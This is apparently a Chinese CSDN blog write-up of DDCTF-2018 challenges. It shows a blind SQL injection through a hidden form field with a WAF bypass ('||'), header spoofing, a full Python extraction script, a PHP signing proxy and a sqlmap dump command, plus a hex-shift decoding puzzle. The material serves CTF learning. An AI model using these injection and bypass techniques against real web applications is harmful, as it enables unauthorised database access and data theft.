DDCTF-2018 Writeup

最新推荐文章于 2023-10-31 09:42:01 发布
最新推荐文章于 2023-10-31 09:42:01 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: Web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39293438/article/details/83242487
版权
Web 同时被 2 个专栏收录
30 篇文章 1 订阅
订阅专栏
CTF
9 篇文章 0 订阅
订阅专栏

Web

数据库的秘密

打开链接提示非法链接,只允许来自 123.232.23.245 的访问,于是添加 X-Forwarded-For 字段,尝试了 Burp 的 Bwapass Waf 插件,还是感觉火狐的 Mdify Headers 好用。

进入页面之后,发现是一个查询文章的功能,结合题目判断是一道 sqli。

利用 Burp 显示隐藏内容的功能,发现在表单中还有一个名字为 author 的字段。

在这里插入图片描述

查询的大概流程为,根据表单的内容加密后的密文,在请求后添加 sig 和 time 参数,sig 参数判断 post 内容是否被修改,time 是一个时间戳,通过这个判定和服务器时间相隔一定时间的请求有效。

在这里插入图片描述

解密后的前端加密脚本如下,hex_math_enc 是 math.js 的一个函数。

在这里插入图片描述

接下来寻找注入点,id 只允许输入数字,title,data 转义了 ’ ,尝试了好像没有宽字节注入,发现这个隐藏的 author 没有过滤 ’ ,注入点就在这里了。

发现以下内容会被 waf 拦截

.....
union select
and 1=1
or 1=1
.....

很迷的一个 waf ,如果只是输入单个单词的话,不会被拦截,前面出现了 or ,后面再出现 = 就会被拦截,试了下用 || 不会被拦截,得到 payload :0' || 1#

是一个盲注,查询成功返回表中所有内容,于是编写脚本,爆数据库的时候,因为过滤了 database() ,可以用select schema_name from information_schema.schemata的方式。

编写脚本有一个难点是根据 payload 构造 sig 和 time 标记,这里有两个思路,第一种根据 javascript 代码编写加密脚本,第二种利用原来的 javascript 来加密,然后再读取。

采用了第二种思路,遇到了一个问题,读取原生 js 加密数据时,通过网页传参返回显然是行不通的,因为 js 脚本是在服务端执行的,直接读取网页返回的是 js 的源代码。py了一份 sn00py 师傅的代码,大师傅的思路是用 selenium 调用浏览器访问网页,达到执行 js 代码的目的。

根据师傅的代码修改的脚本:

import requests
import re
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import HTMLParser

chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument("--disable_gpu")
chrome_options.add_argument("--window-size=1920,1080")
chrome_options.binary_location = r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
driver_path = r"C:\Program Files (x86)\Google\Chrome\Application\chromedriver_win32\chromedriver.exe"

def encode(payload):
    d = webdriver.Chrome(
        executable_path=driver_path,
        chrome_options=chrome_options
    )
    d.implicitly_wait(30)
    d.set_page_load_timeout(30)
    local = r"D:\phpStudy\WWW\ctf\encode.html"
    temp = r"D:\phpStudy\WWW\ctf\temp.html"
    with open(temp) as temp_cont:
        content = temp_cont.read() % payload
    temp_cont.close()
    with open(local, 'w+') as encode_cont:
        encode_cont.write(content)
    encode_cont.close()
    d.get(local)
    # print d.page_source
    key = re.search(r"sig=[a-zA-Z0-9]+&time=[a-zA-Z0-9]+", d.page_source)
    # print key.group(0)
    html_parser = HTMLParser.HTMLParser()
    key = html_parser.unescape(key.group(0))
    # print key

    return key

def sqli():
    flag = []
    url1 = "http://116.85.43.88:8080/JYDJAYLYIPHCJMOQ/dfe3ia/index.php?%s"
    payload1 = "0'|| (ascii(substring((select secvalue from ctf_key9 limit 0,1),%s,1)))=%s#"

    for flag_len in range(1,30):
        print "num %s" % flag_len,
        for ascii in range(68,127):
            payload = payload1 % (flag_len,ascii)
            # print payload
            tag = encode(payload)
            url = url1 % tag
            # print url
            data = {
                'id' : '',
                'title' : '',
                'date' : '',
                'author' : payload,
                'button' : 'search'
            }
            headers = {
                'X-Forwarded-For' : '123.232.23.245'
            }
            res = requests.post(url = url, data = data, headers = headers)
            # print res.text
            if 'admin' in res.text:
                flag.append(chr(ascii))
                break

if __name__ == "__main__":
    sqli()

得到flag:DDCTF{IKIDLHNZMKFUDEQE}

这里再分享看到的一个很新奇的思路(via@Clannad),通过写 php 脚本代理访问的方式,直接用 sqlmap 秒出 flag

代理脚本:

<?php
@$id = $_REQUEST['id'];
@$title = $_REQUEST['title'];
@$author = $_REQUEST['author'];
@$date = $_REQUEST['date'];
$time = time();
$sig = sha1('id='.$id.'title='.$title.'author='.$author.'date='.$date.'time='.$time.'adrefkfweodfsdpiru');

$ch = curl_init();

$post = [
    'id' => $id,
    'title' => $title,
    'author' => $author,
    'date' => $date,
];

curl_setopt($ch, CURLOPT_URL,"http://116.85.43.88:8080/JYDJAYLYIPHCJMOQ/dfe3ia/index.php?sig=$sig&time=$time");
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'X-Forwarded-For: 123.232.23.245',
    ));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);

$ch_out = curl_exec($ch);
$ch_info = curl_getinfo($ch);

$header = substr($ch_out, 0, $ch_info['header_size']);
$body = substr($ch_out, $ch_info['header_size']);

http_response_code($ch_info['http_code']);
//header($header);
//echo $header;
echo $body;

sqlmap 一把梭: sqlmap -u http://127.0.0.1/ctf/proxy.php?author=admin --dump

秒出 flag,震惊~

在这里插入图片描述

MISC

(╯°□°)╯︵ ┻━┻

题目只给了一串16进制数

d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9b2b2e1e2b9b9b7b4e1b4b7e3e4b3b2b2e3e6b4b3e2b5b0b6b1b0e6e1e5e1b5fd

每两位转换成10进制数后范围在 160~280 ,可见10进制 ascii 码范围在 20~126 ,猜测可能是由 ascii 加上固定值得到,于是编写脚本试了下:

# d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9b2b2e1e2b9b9b7b4e1b4b7e3e4b3b2b2e3e6b4b3e2b5b0b6b1b0e6e1e5e1b5fd

ascii = "d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9b2b2e1e2b9b9b7b4e1b4b7e3e4b3b2b2e3e6b4b3e2b5b0b6b1b0e6e1e5e1b5fd"
y = bytearray.fromhex(ascii)
newlist1 = list(y)
newlist2 = list(y)
# print z

for i in range(127,141):
	for j in range(len(newlist1)):
		newlist2[j] = int(newlist1[j]) - i
	for k in newlist2:
		print chr(int(k)),
	print ""

得到一串字符:That was fast!The flag is:DDCTF{922ab9974a47cd322cf43b50610faea5}

后记

成绩依旧很差的一次比赛,认识到了自身的不足,还是继续踏踏实实前进吧。

在这里插入图片描述

参考链接:

Clannad sqlmap 代理:https://clannad.me/ddctf.md.html

要一直努力做最好的自己

柠檬木有枝qwq
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
DDCTF2018 流量分析
pondzhang的专栏
10-14 805
=E4=BD=A0=E5=A5=BD=EF=BC=8C=E8=AF=B7=E4=BD=A0=E5=B0=86=E5=AF=86=E9=92=A5=E5=AE=89=E8=A3=85=E5=88=B0=E6=9C=8D=E5=8A=A1=E5=99=A8=E4=B8=8A=E3=80=82=E8=B0=A2=E8=B0=A2 解码为“你好,请你将密钥安装到服务器上。谢谢” 获得privatekey为 -----BEGIN RSA PRIVATE KEY----- MIICXAIBAAKBgQDCm6vZm
DDCTF2018 WEB 部分WP
1CHIG0的博客
04-26 983
一、前言这次的DDCTF会是我CTF经历的一个关键点,因为在这次比赛里,我真正做出了一道WEB题目,算是实现了从0到1的突破。WEB1为自己的思路,其余题为看Herryzhao和 Wfox 大佬的思路操作了一下,。我慢慢理解,博客也慢慢更(题开到明年是真的良心,感谢主办方)。二、正文1、WEB1:数据库的秘密打开所给链接,发现需要伪造IP,我们用火狐的插件modify headers 修改一下,成...
BUUCTF:[DDCTF2018](°°
末初的CSDN博客
04-05 3450
题目描述: (°° 50pt (°° d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9b2b2e1e2b9b9b7b4e1b4b7e3e4b3b2b2e3e6b4b3e2b5b0b6b1b0e6e1e5e1b5fd 长度为134的字符串,按每两位截取的十六进制 ['...
[DDCTF2018]流量分析
m0_55185160的博客
08-13 498
我们打开文件,其中有一个txt文件和一个流量包 我们得知HTTP流打开需要私钥以及私钥的格式,我们打开流量包 因为一般私钥藏在tcp流中,所以我们在在过滤窗输入tcp contains “KEY” 我们依次进行跟踪流发现第一个没啥,打开第二个发现有一个图片文件中包含了一串base64 于是我们在网站上进行在线解码 得到一个png文件 打开 用qq提取图中文字加上格式后为: -----BEGINRSAPRIVATEKEY----- MIICXAIBAAKBgQDCm6vZm...
[CTF Misc] [DDCTF2018] 流量分析
ShenZ的博客
08-03 654
[DDCTF2018]流量分析 涉及知识点: SMTP协议 ssl密钥 ftp Quoted-printable编码
2019.4 DDCTF web题--滴 writeup
04-14
DDCTF,2019年4月比赛,web题,第一题--滴 writeup,及flag。
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
morpheme-ordering-writeup
03-20
总的来说,"morpheme-ordering-writeup"是一个关于语素排序的研究工作,可能包括理论分析、算法设计、实验验证等多个方面,使用TeX/LaTeX进行排版,通过"morpheme-ordering-writeup-master"的压缩包我们可以获取到...
Prediction-Assignment-Writeup
03-18
9. **代码组织**: "Prediction-Assignment-Writeup-main"可能包含了一个结构化的代码目录,包括数据读取脚本、预处理函数、模型训练代码、结果评估和可视化代码等,体现了良好的编程实践。 10. **报告撰写**: 数据...
DDCTF2018出题心得
08-24
DDCTF 2018出题心得与题解分享-欧家俊, 什么是好的 CTF 题
DDCTF2018(°°writeup
iqiqiya的博客
04-20 1911
  奉上我老哥py脚本 # -*- coding:utf-8 -*- import re import urllib list1=[] list2=[] s = "d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9b2b2e1e2b9b9b7b4e1b4b7e3e4b3b2b2e3e6b4b3...
2018DDCTF misc1
anxiong1803的博客
04-25 351
一、题目: (°° d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1e6b3e3b9e4b3b7b7e2b6 移位密码,跑python脚本得到flag s='d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c...
BUUCTF [DDCTF2018](°°1
最新发布
yanglinchiji的博客
10-31 124
发现最大字母为f且其他均为数字,再删除其余数据,发现该段数据总个数为偶数,可以怀疑是十六进制数据。发现ASCII码没有线索,但是十进制却全部大于128,猜测需要修改十进制数据再转ASCII码。但是由于没有提示,几个基础加密试过后发现没线索,再看这段数据。显然答案就在最下方的数据中,首先怀疑是加密。十进制数据全部 -128后,获得。进行转换,flag就出来了!下载后只有一个txt文档。
【BUUCTF】第九天
weixin_45892681的博客
11-04 462
1.[DDCTF2018](°° 打开是一串16进制数字符串的长度是134所以是两个一组 但是一组字符串的长度超过127于是用暴力破解这个移位密码 用python代码得到flag 2.sqltest 文件是pacp于是进行流量分析 发现是一个bool注入于是导出HTTP数据包得到注入查询字段内容的部分得到一串ASCII码值得到flag ...
2021寒假MISC打卡DAY1
煤矿路口西的博客
01-11 557
CSDN上将按时间顺序更新,每天8道。个人博客上按类别分类。 [SUCTF2018]single dog 得到的 flag 请包上 flag{} 提交。来源:https://github.com/hebtuerror404/CTF_competition_warehouse_2018 一张JPG 右键文件属性无果,查看二进制,文件末尾存在504B0102字样,全文搜索504B0304,得到完整压缩包。 得到1.txt ゚ω゚ノ= /`m´)ノ ~ //*´∇`*/ ['_']; o
DDCTF部分WP
dydxdz的博客
04-22 6006
这周去打了DDCTF,花了一周做出了九道题,完成了1000分的梦想。也算是菜鸡打比赛这么久拿到分数最多的一次了,现记录如下: MISC 1、(°° (°° d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1b2e2e5e2b5b4e4b8b7e...
DDCTF writeup
晨暮的博客
04-22 1156
首先来看我们的题目将文件下载进行题目分析,我们会发现,这个图片所占空间较大,超出了平常图片的范围 猜测,图片内隐藏了文件对图片进行字节码分析发现文件内藏有压缩文件对其进行分离发现分理出一个带有密码的压缩文件对压缩包进行破解解压得 进行一顿栅栏,编码等解密,无果。破了很久,最后回头看题目看了的提示得flagDDCTF{x1n9shaNgbIci} ...
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值